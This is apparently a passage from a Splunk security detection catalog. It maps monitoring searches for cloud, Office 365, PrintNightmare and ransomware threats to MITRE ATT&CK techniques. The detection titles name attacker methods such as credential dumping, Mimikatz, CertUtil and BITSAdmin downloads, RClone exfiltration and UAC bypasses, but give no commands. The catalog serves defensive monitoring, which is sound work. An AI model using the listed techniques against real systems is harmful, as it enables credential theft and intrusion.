Registry Keys Used For Privilege Escalation

T1546.012

Image File Execution Options Injection

Privilege Escalation, Persistence

TTP

Kill Chain Phase

  • Actions on Objective
  • Actions on Objectives
  • Command and Control
  • Installation


Reference


version: 1


Container implantation monitoring and investigation

Use the searches in this story to monitor your Kubernetes registry repositories for upload, and deployment of potentially vulnerable, backdoor, or implanted containers. These searches provide information on source users, destination path, container names and repository names. The searches provide context to address Mitre T1525 which refers to container implantation upload to a company's repository either in Amazon Elastic Container Registry, Google Container Registry and Azure Container Registry.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-02-20
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
New container uploaded to AWS ECR

T1525

Implant Internal Image

Persistence

Hunting

Kill Chain Phase

Reference


version: 1


Dev sec ops

This story is focused around detecting attacks on a DevSecOps lifeccycle which consists of the phases plan, code, build, test, release, deploy, operate and monitor.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud, Dev Sec Ops Analytics
  • Datamodel:
  • Last Updated: 2021-08-18
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
AWS ECR Container Scanning Findings High

T1204.003, T1554, T1195.001, T1212, T1526

Malicious Image, Compromise Client Software Binary, Compromise Software Dependencies and Development Tools, Exploitation for Credential Access, Cloud Service Discovery

Execution, Persistence, Initial Access, Credential Access, Discovery

TTP
AWS ECR Container Scanning Findings Low Informational Unknown

T1204.003

Malicious Image

Execution

Hunting
AWS ECR Container Scanning Findings Medium

T1204.003

Malicious Image

Execution

Anomaly
AWS ECR Container Upload Outside Business Hours

T1204.003

Malicious Image

Execution

Anomaly
AWS ECR Container Upload Unknown User

T1204.003

Malicious Image

Execution

Anomaly
Circle CI Disable Security Job

T1554

Compromise Client Software Binary

Persistence

Anomaly
Circle CI Disable Security Step

T1554

Compromise Client Software Binary

Persistence

Anomaly
Correlation by Repository and Risk

T1204.003

Malicious Image

Execution

Correlation
Correlation by User and Risk

T1204.003

Malicious Image

Execution

Correlation
GitHub Dependabot Alert

T1195.001

Compromise Software Dependencies and Development Tools

Initial Access

Anomaly
GitHub Pull Request from Unknown User

T1195.001

Compromise Software Dependencies and Development Tools

Initial Access

Anomaly
Kubernetes Nginx Ingress LFI

T1212

Exploitation for Credential Access

Credential Access

TTP
Kubernetes Nginx Ingress RFI

T1212

Exploitation for Credential Access

Credential Access

TTP
Kubernetes Scanner Image Pulling

T1526

Cloud Service Discovery

Discovery

TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Gcp cross account activity

Track when a user assumes an IAM role in another GCP account to obtain cross-account access to services and resources in that account. Accessing new roles could be an indication of malicious activity.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-09-01
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
GCP Detect gcploit framework

T1078

Valid Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

TTP

Kill Chain Phase

  • Lateral Movement


Reference


version: 1


Kubernetes scanning activity

This story addresses detection against Kubernetes cluster fingerprint scan and attack by providing information on items such as source ip, user agent, cluster names.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-04-15
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Amazon EKS Kubernetes Pod scan detection

T1526

Cloud Service Discovery

Discovery

Hunting
Amazon EKS Kubernetes cluster scan detection

T1526

Cloud Service Discovery

Discovery

Hunting
GCP Kubernetes cluster pod scan detection

T1526

Cloud Service Discovery

Discovery

Hunting

Kill Chain Phase

  • Reconnaissance


Reference


version: 1


Kubernetes sensitive object access activity

This story addresses detection and response of accounts acccesing Kubernetes cluster sensitive objects such as configmaps or secrets providing information on items such as user user, group. object, namespace and authorization reason.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-05-20
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Kubernetes AWS detect suspicious kubectl calls Hunting

Kill Chain Phase

  • Lateral Movement


Reference


version: 1


Office 365 detections

This story is focused around detecting Office 365 Attacks.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-12-16
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
High Number of Login Failures from a single source

T1110.001, T1136.003, T1562.007, T1556, T1110, T1114, T1114.003, T1114.002

Password Guessing, Cloud Account, Disable or Modify Cloud Firewall, Modify Authentication Process, Brute Force, Email Collection, Email Forwarding Rule, Remote Email Collection

Credential Access, Persistence, Defense Evasion, Credential Access, Defense Evasion, Persistence, Credential Access, Collection, Collection, Collection

Anomaly
O365 Add App Role Assignment Grant User

T1136.003

Cloud Account

Persistence

TTP
O365 Added Service Principal

T1136.003

Cloud Account

Persistence

TTP
O365 Bypass MFA via Trusted IP

T1562.007

Disable or Modify Cloud Firewall

Defense Evasion

TTP
O365 Disable MFA

T1556

Modify Authentication Process

Credential Access, Defense Evasion, Persistence

TTP
O365 Excessive Authentication Failures Alert

T1110

Brute Force

Credential Access

Anomaly
O365 Excessive SSO logon errors

T1556

Modify Authentication Process

Credential Access, Defense Evasion, Persistence

Anomaly
O365 New Federated Domain Added

T1136.003

Cloud Account

Persistence

TTP
O365 PST export alert

T1114

Email Collection

Collection

TTP
O365 Suspicious Admin Email Forwarding

T1114.003

Email Forwarding Rule

Collection

Anomaly
O365 Suspicious Rights Delegation

T1114.002

Remote Email Collection

Collection

TTP
O365 Suspicious User Email Forwarding

T1114.003

Email Forwarding Rule

Collection

Anomaly

Kill Chain Phase

  • Actions on Objective
  • Actions on Objectives
  • Not Applicable


Reference


version: 1


Suspicious aws login activities

Monitor your AWS authentication events using your CloudTrail logs. Searches within this Analytic Story will help you stay aware of and investigate suspicious logins.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Authentication
  • Last Updated: 2019-05-01
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Detect AWS Console Login by User from New City

T1535

Unused/Unsupported Cloud Regions

Defense Evasion

Hunting
Detect AWS Console Login by User from New Country

T1535

Unused/Unsupported Cloud Regions

Defense Evasion

Hunting
Detect AWS Console Login by User from New Region

T1535

Unused/Unsupported Cloud Regions

Defense Evasion

Hunting

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Suspicious aws s3 activities

Use the searches in this Analytic Story to monitor your AWS S3 buckets for evidence of anomalous activity and suspicious behaviors, such as detecting open S3 buckets and buckets being accessed from a new IP. The contextual and investigative searches will give you more information, when required.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2018-07-24
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Detect New Open S3 Buckets over AWS CLI

T1530

Data from Cloud Storage Object

Collection

TTP
Detect New Open S3 buckets

T1530

Data from Cloud Storage Object

Collection

TTP
Detect S3 access from a new IP

T1530

Data from Cloud Storage Object

Collection

Anomaly
Detect Spike in S3 Bucket deletion

T1530

Data from Cloud Storage Object

Collection

Anomaly

Kill Chain Phase

  • Actions on Objectives


Reference


version: 2


Suspicious aws traffic

Leverage these searches to monitor your AWS network traffic for evidence of anomalous activity and suspicious behaviors, such as a spike in blocked outbound traffic in your virtual private cloud (VPC).

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2018-05-07
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Detect Spike in blocked Outbound Traffic from your AWS Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Reference


version: 1


Suspicious cloud authentication activities

Monitor your cloud authentication events. Searches within this Analytic Story leverage the recent cloud updates to the Authentication data model to help you stay aware of and investigate suspicious login activity.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Authentication
  • Last Updated: 2020-06-04
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
AWS Cross Account Activity From Previously Unseen Account Anomaly
Detect AWS Console Login by New User Hunting
Detect AWS Console Login by User from New City

T1535

Unused/Unsupported Cloud Regions

Defense Evasion

Hunting
Detect AWS Console Login by User from New Country

T1535

Unused/Unsupported Cloud Regions

Defense Evasion

Hunting
Detect AWS Console Login by User from New Region

T1535

Unused/Unsupported Cloud Regions

Defense Evasion

Hunting

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Suspicious cloud instance activities

Monitor your cloud infrastructure provisioning activities for behaviors originating from unfamiliar or unusual locations. These behaviors may indicate that malicious activities are occurring somewhere within your cloud environment.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Change
  • Last Updated: 2020-08-25
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Abnormally High Number Of Cloud Instances Destroyed

T1078.004, T1537

Cloud Accounts, Transfer Data to Cloud Account

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Exfiltration

Anomaly
Abnormally High Number Of Cloud Instances Launched

T1078.004, T1535

Cloud Accounts, Unused/Unsupported Cloud Regions

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Defense Evasion

Anomaly
Cloud Instance Modified By Previously Unseen User

T1078.004

Cloud Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly
Detect shared ec2 snapshot

T1537

Transfer Data to Cloud Account

Exfiltration

TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Suspicious cloud provisioning activities

Monitor your cloud infrastructure provisioning activities for behaviors originating from unfamiliar or unusual locations. These behaviors may indicate that malicious activities are occurring somewhere within your cloud environment.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Change
  • Last Updated: 2018-08-20
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Cloud Provisioning Activity From Previously Unseen City

T1078

Valid Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly
Cloud Provisioning Activity From Previously Unseen Country

T1078

Valid Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly
Cloud Provisioning Activity From Previously Unseen IP Address

T1078

Valid Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly
Cloud Provisioning Activity From Previously Unseen Region

T1078

Valid Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly

Kill Chain Phase

Reference


version: 1


Suspicious cloud user activities

Detect and investigate suspicious activities by users and roles in your cloud environments.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Change
  • Last Updated: 2020-09-04
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
AWS IAM AccessDenied Discovery Events

T1580, T1078.004, T1078

Cloud Infrastructure Discovery, Cloud Accounts, Valid Accounts

Discovery, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly
Abnormally High Number Of Cloud Infrastructure API Calls

T1078.004

Cloud Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly
Abnormally High Number Of Cloud Security Group API Calls

T1078.004

Cloud Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly
Cloud API Calls From Previously Unseen User Roles

T1078

Valid Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Reconnaissance


Reference


version: 1


Suspicious gcp storage activities

Use the searches in this Analytic Story to monitor your GCP Storage buckets for evidence of anomalous activity and suspicious behaviors, such as detecting open storage buckets and buckets being accessed from a new IP. The contextual and investigative searches will give you more information, when required.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-08-05
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Detect GCP Storage access from a new IP

T1530

Data from Cloud Storage Object

Collection

Anomaly
Detect New Open GCP Storage Buckets

T1530

Data from Cloud Storage Object

Collection

TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1



Lateral Movement

Printnightmare cve-2021-34527

The following analytic story identifies behaviors related PrintNightmare, or CVE-2021-34527 previously known as (CVE-2021-1675), to gain privilege escalation on the vulnerable machine.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-07-01
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Print Spooler Adding A Printer Driver

T1547.012, T1218.011, T1068

Print Processors, Rundll32, Exploitation for Privilege Escalation

Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation

TTP
Print Spooler Failed to Load a Plug-in

T1547.012

Print Processors

Persistence, Privilege Escalation

TTP
Rundll32 with no Command Line Arguments with Network

T1218.011

Rundll32

Defense Evasion

TTP
Spoolsv Spawning Rundll32

T1547.012

Print Processors

Persistence, Privilege Escalation

TTP
Spoolsv Suspicious Loaded Modules

T1547.012

Print Processors

Persistence, Privilege Escalation

TTP
Spoolsv Suspicious Process Access

T1068

Exploitation for Privilege Escalation

Privilege Escalation

TTP
Spoolsv Writing a DLL

T1547.012

Print Processors

Persistence, Privilege Escalation

TTP
Spoolsv Writing a DLL - Sysmon

T1547.012

Print Processors

Persistence, Privilege Escalation

TTP
Suspicious Rundll32 no Command Line Arguments

T1218.011

Rundll32

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1



Malware

Blackmatter ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the BlackMatter ransomware, including looking for file writes associated with BlackMatter, force safe mode boot, autadminlogon account registry modification and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-09-06
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Add DefaultUser And Password In Registry

T1552.002, T1490, T1491, T1486

Credentials in Registry, Inhibit System Recovery, Defacement, Data Encrypted for Impact

Credential Access, Impact, Impact, Impact

Anomaly
Auto Admin Logon Registry Entry

T1552.002

Credentials in Registry

Credential Access

TTP
Bcdedit Command Back To Normal Mode Boot

T1490

Inhibit System Recovery

Impact

TTP
Change To Safe Mode With Network Config

T1490

Inhibit System Recovery

Impact

TTP
Known Services Killed by Ransomware

T1490

Inhibit System Recovery

Impact

TTP
Modification Of Wallpaper

T1491

Defacement

Impact

TTP
Ransomware Notes bulk creation

T1486

Data Encrypted for Impact

Impact

Anomaly

Kill Chain Phase

  • Exploitation
  • Obfuscation


Reference


version: 1


Clop ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the Clop ransomware, including looking for file writes associated with Clope, encrypting network shares, deleting and resizing shadow volume storage, registry key modification, deleting of security logs, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-03-17
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Clop Common Exec Parameter

T1204, T1543, T1485, T1569.002, T1490, T1486, T1070, T1489, T1070.001

User Execution, Create or Modify System Process, Data Destruction, Service Execution, Inhibit System Recovery, Data Encrypted for Impact, Indicator Removal on Host, Service Stop, Clear Windows Event Logs

Execution, Persistence, Privilege Escalation, Impact, Execution, Impact, Impact, Defense Evasion, Impact, Defense Evasion

TTP
Clop Ransomware Known Service Name

T1543

Create or Modify System Process

Persistence, Privilege Escalation

TTP
Common Ransomware Extensions

T1485

Data Destruction

Impact

Hunting
Common Ransomware Notes

T1485

Data Destruction

Impact

Hunting
Create Service In Suspicious File Path

T1569.002

Service Execution

Execution

TTP
Deleting Shadow Copies

T1490, T1070, T1070.001

Inhibit System Recovery, Indicator Removal on Host, Clear Windows Event Logs

Impact, Defense Evasion, Defense Evasion

TTP
High File Deletion Frequency

T1485

Data Destruction

Impact

Anomaly
High Process Termination Frequency

T1486

Data Encrypted for Impact

Impact

Anomaly
Process Deleting Its Process File Path

T1070

Indicator Removal on Host

Defense Evasion

TTP
Ransomware Notes bulk creation

T1486

Data Encrypted for Impact

Impact

Anomaly
Resize ShadowStorage volume

T1490

Inhibit System Recovery

Impact

TTP
Resize Shadowstorage Volume

T1489

Service Stop

Impact

TTP
Suspicious Event Log Service Behavior

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
Suspicious wevtutil Usage

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
WevtUtil Usage To Clear Logs

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
Windows Event Log Cleared

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Obfuscation
  • Privilege Escalation


Reference


version: 1


Coldroot macos rat

Leverage searches that allow you to detect and investigate unusual activities that relate to the ColdRoot Remote Access Trojan that affects MacOS. An example of some of these activities are changing sensative binaries in the MacOS sub-system, detecting process names and executables associated with the RAT, detecting when a keyboard tab is installed on a MacOS machine and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2019-01-09
  • Use Case: Advanced Threat Detection

Dhs report ta18-074a

Monitor for suspicious activities associated with DHS Technical Alert US-CERT TA18-074A. Some of the activities that adversaries used in these compromises included spearfishing attacks, malware, watering-hole domains, many and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Traffic
  • Last Updated: 2020-01-22
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Create local admin accounts using net exe

T1136.001, T1071.002, T1021.002, T1569.002, T1059.001, T1562.004, T1547.001, T1543.003, T1053.005, T1204.002, T1112

Local Account, File Transfer Protocols, SMB/Windows Admin Shares, Service Execution, PowerShell, Disable or Modify System Firewall, Registry Run Keys / Startup Folder, Windows Service, Scheduled Task, Malicious File, Modify Registry

Persistence, Command And Control, Lateral Movement, Execution, Execution, Defense Evasion, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Execution, Persistence, Privilege Escalation, Execution, Defense Evasion

TTP
Detect New Local Admin account

T1136.001

Local Account

Persistence

TTP
Detect Outbound SMB Traffic

T1071.002

File Transfer Protocols

Command And Control

TTP
Detect PsExec With accepteula Flag

T1021.002

SMB/Windows Admin Shares

Lateral Movement

TTP
Detect Renamed PSExec

T1569.002

Service Execution

Execution

Hunting
Malicious PowerShell Process - Execution Policy Bypass

T1059.001

PowerShell

Execution

TTP
Processes launching netsh

T1562.004

Disable or Modify System Firewall

Defense Evasion

TTP
Registry Keys Used For Persistence

T1547.001

Registry Run Keys / Startup Folder

Persistence, Privilege Escalation

TTP
SMB Traffic Spike

T1021.002

SMB/Windows Admin Shares

Lateral Movement

Anomaly
SMB Traffic Spike - MLTK

T1021.002

SMB/Windows Admin Shares

Lateral Movement

Anomaly
Sc exe Manipulating Windows Services

T1543.003

Windows Service

Persistence, Privilege Escalation

TTP
Scheduled Task Deleted Or Created via CMD

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP
Single Letter Process On Endpoint

T1204.002

Malicious File

Execution

TTP
Suspicious Reg exe Process

T1112

Modify Registry

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Execution
  • Exploitation
  • Installation
  • Lateral Movement


Reference


version: 2


Darkside ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the DarkSide Ransomware

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-05-12
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Attempted Credential Dump From Registry via Reg exe

T1003.002, T1197, T1105, T1218.003, T1055, T1490, T1003.001, T1021.002, T1020, T1569.002, T1486, T1548.002

Security Account Manager, BITS Jobs, Ingress Tool Transfer, CMSTP, Process Injection, Inhibit System Recovery, LSASS Memory, SMB/Windows Admin Shares, Automated Exfiltration, Service Execution, Data Encrypted for Impact, Bypass User Account Control

Credential Access, Defense Evasion, Persistence, Command And Control, Defense Evasion, Defense Evasion, Privilege Escalation, Impact, Credential Access, Lateral Movement, Exfiltration, Execution, Impact, Privilege Escalation, Defense Evasion

TTP
BITSAdmin Download File

T1197, T1105

BITS Jobs, Ingress Tool Transfer

Defense Evasion, Persistence, Command And Control

TTP
CMLUA Or CMSTPLUA UAC Bypass

T1218.003

CMSTP

Defense Evasion

TTP
CertUtil Download With URLCache and Split Arguments

T1105

Ingress Tool Transfer

Command And Control

TTP
CertUtil Download With VerifyCtl and Split Arguments

T1105

Ingress Tool Transfer

Command And Control

TTP
Cobalt Strike Named Pipes

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Delete ShadowCopy With PowerShell

T1490

Inhibit System Recovery

Impact

TTP
Detect Mimikatz Using Loaded Images

T1003.001

LSASS Memory

Credential Access

TTP
Detect PsExec With accepteula Flag

T1021.002

SMB/Windows Admin Shares

Lateral Movement

TTP
Detect RClone Command-Line Usage

T1020

Automated Exfiltration

Exfiltration

TTP
Detect Renamed PSExec

T1569.002

Service Execution

Execution

Hunting
Detect Renamed RClone

T1020

Automated Exfiltration

Exfiltration

Hunting
Extraction of Registry Hives

T1003.002

Security Account Manager

Credential Access

TTP
Ransomware Notes bulk creation

T1486

Data Encrypted for Impact

Impact

Anomaly
SLUI RunAs Elevated

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP
SLUI Spawning a Process

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Execution
  • Exfiltration
  • Exploitation
  • Lateral Movement
  • Obfuscation


Reference


version: 1


Dynamic dns

Detect and investigate hosts in your environment that may be communicating with dynamic domain providers. Attackers may leverage these services to help them avoid firewall blocks and deny lists.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Resolution
  • Last Updated: 2018-09-06
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
DNS Exfiltration Using Nslookup App

T1048, T1071.004, T1048.003, T1095, T1041, T1189, T1537, T1114.001, T1114, T1114.003, T1071.001

Exfiltration Over Alternative Protocol, DNS, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Non-Application Layer Protocol, Exfiltration Over C2 Channel, Drive-by Compromise, Transfer Data to Cloud Account, Local Email Collection, Email Collection, Email Forwarding Rule, Web Protocols

Exfiltration, Command And Control, Exfiltration, Command And Control, Exfiltration, Initial Access, Exfiltration, Collection, Collection, Collection, Command And Control

TTP
Detect hosts connecting to dynamic domain providers

T1189

Drive-by Compromise

Initial Access

TTP
Excessive Usage of NSLOOKUP App

T1048

Exfiltration Over Alternative Protocol

Exfiltration

Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Exploitation


Reference


version: 2


Emotet malware dhs report ta18-201a

Detect rarely used executables, specific registry paths that may confer malware survivability and persistence, instances where cmd.exe is used to launch script interpreters, and other indicators that the Emotet financial malware has compromised your environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Email, Endpoint, Network_Traffic
  • Last Updated: 2020-01-27
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect Rare Executables Anomaly
Detect Use of cmd exe to Launch Script Interpreters

T1059.003, T1072, T1547.001, T1021.002, T1566.001

Windows Command Shell, Software Deployment Tools, Registry Run Keys / Startup Folder, SMB/Windows Admin Shares, Spearphishing Attachment

Execution, Execution, Lateral Movement, Persistence, Privilege Escalation, Lateral Movement, Initial Access

TTP
Detection of tools built by NirSoft

T1072

Software Deployment Tools

Execution, Lateral Movement

TTP
Email Attachments With Lots Of Spaces Anomaly
Registry Keys Used For Persistence

T1547.001

Registry Run Keys / Startup Folder

Persistence, Privilege Escalation

TTP
SMB Traffic Spike

T1021.002

SMB/Windows Admin Shares

Lateral Movement

Anomaly
SMB Traffic Spike - MLTK

T1021.002

SMB/Windows Admin Shares

Lateral Movement

Anomaly
Suspicious Email Attachment Extensions

T1566.001

Spearphishing Attachment

Initial Access

Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Delivery
  • Exploitation
  • Installation


Reference


version: 1


Fin7

Leverage searches that allow you to detect and investigate unusual activities that might relate to the FIN7 JS Implant and JSSLoader, including looking for Image Loading of ldap and wmi modules, associated with its payload, data collection and script execution.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-09-14
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Check Elevated CMD using whoami

T1033, T1059.007, T1555.003, T1566.001, T1220

System Owner/User Discovery, JavaScript, Credentials from Web Browsers, Spearphishing Attachment, XSL Script Processing

Discovery, Execution, Credential Access, Initial Access, Defense Evasion

TTP
Cmdline Tool Not Executed In CMD Shell

T1059.007

JavaScript

Execution

TTP
Jscript Execution Using Cscript App

T1059.007

JavaScript

Execution

TTP
MS Scripting Process Loading Ldap Module

T1059.007

JavaScript

Execution

Anomaly
MS Scripting Process Loading WMI Module

T1059.007

JavaScript

Execution

Anomaly
Non Chrome Process Accessing Chrome Default Dir

T1555.003

Credentials from Web Browsers

Credential Access

Anomaly
Non Firefox Process Access Firefox Profile Dir

T1555.003

Credentials from Web Browsers

Credential Access

Anomaly
Office Application Drop Executable

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Product Spawning Wmic

T1566.001

Spearphishing Attachment

Initial Access

TTP
XSL Script Execution With WMIC

T1220

XSL Script Processing

Defense Evasion

TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Hidden cobra malware

Monitor for and investigate activities, including the creation or deletion of hidden shares and file writes, that may be evidence of infiltration by North Korean government-sponsored cybercriminals. Details of this activity were reported in DHS Report TA-18-149A.

Detection Profile

name ID Technique Tactic Type
Create or delete windows shares using net exe

T1070.005, T1071.004, T1048.003, T1071.002, T1021.001, T1021.002

Network Share Connection Removal, DNS, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, File Transfer Protocols, Remote Desktop Protocol, SMB/Windows Admin Shares

Defense Evasion, Command And Control, Exfiltration, Command And Control, Lateral Movement, Lateral Movement

TTP
DNS Query Length Outliers - MLTK

T1071.004

DNS

Command And Control

Anomaly
DNS Query Length With High Standard Deviation

T1048.003

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Exfiltration

Anomaly
Detect Outbound SMB Traffic

T1071.002

File Transfer Protocols

Command And Control

TTP
Remote Desktop Network Traffic

T1021.001

Remote Desktop Protocol

Lateral Movement

Anomaly
Remote Desktop Process Running On System

T1021.001

Remote Desktop Protocol

Lateral Movement

Hunting
SMB Traffic Spike

T1021.002

SMB/Windows Admin Shares

Lateral Movement

Anomaly
SMB Traffic Spike - MLTK

T1021.002

SMB/Windows Admin Shares

Lateral Movement

Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Reference


version: 2


Icedid

Leverage searches that allow you to detect and investigate unusual activities that might relate to the IcedID banking trojan, including looking for file writes associated with its payload, process injection, shellcode execution and data collection.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-07-29
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Account Discovery With Net App

T1087.002, T1562.001, T1059, T1055, T1204.002, T1548.002, T1112, T1560.001, T1218.005, T1482, T1566.001, T1547.001, T1218.011, T1053, T1005, T1218.010, T1590.005, T1027, T1053.005, T1021.002

Domain Account, Disable or Modify Tools, Command and Scripting Interpreter, Process Injection, Malicious File, Bypass User Account Control, Modify Registry, Archive via Utility, Mshta, Domain Trust Discovery, Spearphishing Attachment, Registry Run Keys / Startup Folder, Rundll32, Scheduled Task/Job, Data from Local System, Regsvr32, IP Addresses, Obfuscated Files or Information, Scheduled Task, SMB/Windows Admin Shares

Discovery, Defense Evasion, Execution, Defense Evasion, Privilege Escalation, Execution, Privilege Escalation, Defense Evasion, Defense Evasion, Collection, Defense Evasion, Discovery, Initial Access, Persistence, Privilege Escalation, Defense Evasion, Execution, Persistence, Privilege Escalation, Collection, Defense Evasion, Reconnaissance, Defense Evasion, Execution, Persistence, Privilege Escalation, Lateral Movement

TTP
CHCP Command Execution

T1059

Command and Scripting Interpreter

Execution

TTP
Create Remote Thread In Shell Application

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Drop IcedID License dat

T1204.002

Malicious File

Execution

Hunting
Eventvwr UAC Bypass

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP
FodHelper UAC Bypass

T1112, T1548.002

Modify Registry, Bypass User Account Control

Defense Evasion, Privilege Escalation, Defense Evasion

TTP
IcedID Exfiltrated Archived File Creation

T1560.001

Archive via Utility

Collection

Hunting
Mshta spawning Rundll32 OR Regsvr32 Process

T1218.005

Mshta

Defense Evasion

TTP
NLTest Domain Trust Discovery

T1482

Domain Trust Discovery

Discovery

TTP
Office Application Spawn Regsvr32 process

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Application Spawn rundll32 process

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Document Executing Macro Code

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Product Spawning MSHTA

T1566.001

Spearphishing Attachment

Initial Access

TTP
Registry Keys Used For Persistence

T1547.001

Registry Run Keys / Startup Folder

